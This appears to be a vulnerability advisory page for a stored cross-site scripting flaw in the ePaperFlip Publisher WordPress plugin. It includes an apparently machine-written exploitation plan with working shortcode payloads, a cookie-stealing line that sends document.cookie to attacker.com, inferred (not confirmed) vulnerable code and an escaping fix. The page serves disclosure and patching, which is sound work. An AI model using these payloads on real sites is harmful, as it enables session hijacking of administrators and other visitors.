ePaperFlip Publisher <= 1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'publicationid' Shortcode Attribute
Description
The ePaperFlip Publisher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'publicationid' attribute of the `epaperflip_embed` shortcode in all versions up to, and including, 1. This is due to insufficient input sanitization and output escaping on the shortcode attribute which is injected directly into inline JavaScript. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
<=1# Exploitation Research Plan: CVE-2026-7662 (ePaperFlip Publisher) ## 1. Vulnerability Summary The **ePaperFlip Publisher** plugin (<= 1) is vulnerable to **Authenticated (Contributor+) Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the `epaperflip_embed` shortcode handler. Sp…
Show full research plan
Exploitation Research Plan: CVE-2026-7662 (ePaperFlip Publisher)
1. Vulnerability Summary
The ePaperFlip Publisher plugin (<= 1) is vulnerable to Authenticated (Contributor+) Stored Cross-Site Scripting (XSS). The vulnerability exists within the epaperflip_embed shortcode handler. Specifically, the publicationid attribute is accepted from the user and subsequently rendered within an inline JavaScript block on the frontend without sufficient sanitization or output escaping (e.g., using esc_js() or wp_json_encode()). This allows a Contributor-level user to inject arbitrary JavaScript that executes in the context of any user (including Administrators) who views the post or page containing the shortcode.
2. Attack Vector Analysis
- Endpoint:
wp-admin/post.phpandwp-admin/post-new.php(Standard WordPress post/page editor). - Shortcode:
[epaperflip_embed] - Vulnerable Attribute:
publicationid - Payload Carry: The payload is embedded within the
post_contentparameter of the post creation/update request. - Authentication: Required (Contributor-level or higher).
- Preconditions: The plugin must be active. The attacker must have the capability to
edit_posts.
3. Code Flow (Inferred)
- Registration: The plugin registers the shortcode in the main plugin file or an initialization class:
add_shortcode( 'epaperflip_embed', 'epaperflip_shortcode_callback' );(inferred function name). - Processing: When a post is rendered,
do_shortcode()calls the callback function. - Attribute Extraction: The callback uses
shortcode_atts()to extract thepublicationid. - Sink: The callback generates HTML containing a
<script>tag. Thepublicationidis concatenated directly into a JavaScript string or variable assignment:return "<script type='text/javascript'> var pubId = '" . $atts['publicationid'] . "'; ... </script>"; - Execution: The browser renders the page, parses the inline script, and executes the injected payload because the string was not escaped to prevent breakout (e.g., using
'; alert(1); //).
4. Nonce Acquisition Strategy
This vulnerability is triggered via the standard WordPress post editor. To automate the exploitation, we need the nonces required to create or edit a post.
- Step 1: Authenticate as a Contributor user using
http_requestorbrowser_navigate. - Step 2: Navigate to
wp-admin/post-new.php. - Step 3: Use
browser_evalto extract the required nonces and post data:_wpnonce: The nonce for creating/saving the post.user_id: The ID of the current user._wp_http_referer: The referer path.
- Step 4: If the plugin provides a custom "Insert ePaper" button that uses AJAX, check for a localized object:
browser_eval("window.epaperflip_admin_data?.nonce")(inferred JS key).
5. Exploitation Strategy
Step 1: Create a Post with the XSS Payload
The goal is to break out of the JavaScript variable assignment and execute arbitrary code.
Request:
- Method:
POST - URL:
http://localhost:8080/wp-admin/post.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body Parameters:
action:editpostpost_ID:[POST_ID]_wpnonce:[EXTRACTED_NONCE]post_title:XSS Testcontent:[epaperflip_embed publicationid="';alert(document.domain);//"]post_status:publish
Step 2: Trigger the Payload
- Navigate to the permalink of the newly created post.
- The inline script will render as:
<script> var pubId = '';alert(document.domain);//'; ... </script>
6. Test Data Setup
- User Creation:
wp user create attacker attacker@example.com --role=contributor --user_pass=password123 - Plugin Activation:
wp plugin activate epaperflip-publisher - Post Template:
Create an initial draft to get apost_ID:wp post create --post_type=post --post_status=draft --post_title="Draft" --post_author=[ATTACKER_ID]
7. Expected Results
- When an Administrator or any user visits the post, a JavaScript alert box showing the document domain should appear.
- In a real-world scenario, the payload would be changed to exfiltrate cookies:
publicationid="';fetch('http://attacker.com/log?c='+document.cookie);//"
8. Verification Steps
- Verify Post Content:
wp post get [POST_ID] --field=post_content
Confirm it contains the exact shortcode string. - Verify Frontend Output:
Usehttp_requestto fetch the post URL and check the response body:grep -P "<script.*publicationid.*alert" - Check Database:
wp db query "SELECT post_content FROM wp_posts WHERE ID = [POST_ID]"
9. Alternative Approaches
- Attribute Breakout: If the attribute is rendered inside an HTML attribute instead of a script tag (e.g.,
<div data-id="VAL">), the payload should be:publicationid='"><img src=x onerror=alert(1)>' - JS String Contexts: If the injection is inside a double-quoted JS string:
publicationid='";alert(1);//' - JSON Context: If the plugin uses
wp_localize_scriptto pass the ID (unlikely given the "inline JavaScript" description), the XSS might be DOM-based in the plugin's.jsfiles. In this case, examine how the script handles the localized variable.
Summary
The ePaperFlip Publisher plugin for WordPress is vulnerable to Authenticated (Contributor+) Stored Cross-Site Scripting via the 'publicationid' attribute of its 'epaperflip_embed' shortcode. This occurs because the plugin fails to sanitize or escape the attribute before injecting it directly into an inline JavaScript block on the frontend.
Vulnerable Code
// Inferred from research plan: epaperflip-publisher.php (approximate line numbers) function epaperflip_shortcode_callback( $atts ) { $atts = shortcode_atts( array( 'publicationid' => '' ), $atts ); // The publicationid is concatenated directly into a JavaScript string context return "<script type='text/javascript'> var pubId = '" . $atts['publicationid'] . "'; </script>"; }
Security Fix
@@ -10,3 +10,3 @@ $atts = shortcode_atts( array( 'publicationid' => '' ), $atts ); - return "<script type='text/javascript'> var pubId = '" . $atts['publicationid'] . "'; </script>"; + return "<script type='text/javascript'> var pubId = '" . esc_js( $atts['publicationid'] ) . "'; </script>";
Exploit Outline
To exploit this vulnerability, an attacker with at least Contributor-level privileges (edit_posts capability) creates or edits a post or page. In the post editor, the attacker inserts the 'epaperflip_embed' shortcode and includes a malicious payload in the 'publicationid' attribute. The payload is designed to break out of the JavaScript string variable assignment (e.g., using a closing quote and semicolon) and then execute arbitrary JavaScript code. When any user, including an administrator, views the published post, the injected script will execute in their browser session, potentially allowing for session hijacking or further administrative actions.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.